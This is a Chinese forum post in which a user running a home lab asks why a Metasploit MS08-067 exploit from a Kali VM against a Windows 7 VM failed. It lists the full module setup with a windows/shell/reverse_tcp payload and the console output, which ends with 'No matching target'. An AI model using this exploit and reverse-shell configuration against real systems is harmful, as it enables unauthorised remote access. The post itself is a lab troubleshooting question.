linux ms08 067漏洞,MS08067攻击实验失败的原因是什么?

在本文中,博主描述了一次使用Kali Linux针对Windows 7靶机尝试利用MS08-067漏洞进行攻击的过程。他们成功建立了反向TCP连接,但最终因找不到匹配的目标而未能建立会话。问题可能在于靶机设置或攻击机的配置。
摘要由CSDN通过智能技术生成

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

靶机:虚拟机win7 x64 专业版 nat网络 IP:192.168.233.128(新安装)

攻击机:虚拟机Kali Linux nat网络 IP:192.168.233.129

靶机与虚拟机双向ping通,nmap检测靶机445端口开放

命令:

use windows/smb/ms08_067_netapi

set PAYLOAD windows/shell/reverse_tcp

set RHOST 192.168.233.128

set LHOST 192.168.233.129

最后检查配置:

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.233.128 yes The target address

RPORT 445 yes The SMB service port (TCP)

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.233.129 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

确认无误,命令:

run

返回:

[*] Started reverse TCP handler on 192.168.233.129:4444

[*] 192.168.233.128:445 - Automatically detecting the target...

[*] 192.168.233.128:445 - Fingerprint: Windows 7 - - lang:Unknown

[*] 192.168.233.128:445 - We could not detect the language pack, defaulting to English

[-] 192.168.233.128:445 - Exploit aborted due to failure: no-target: No matching target

[*] Exploit completed, but no session was created.

然后就没有然后了,这是怎么回事?靶机有问题?

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值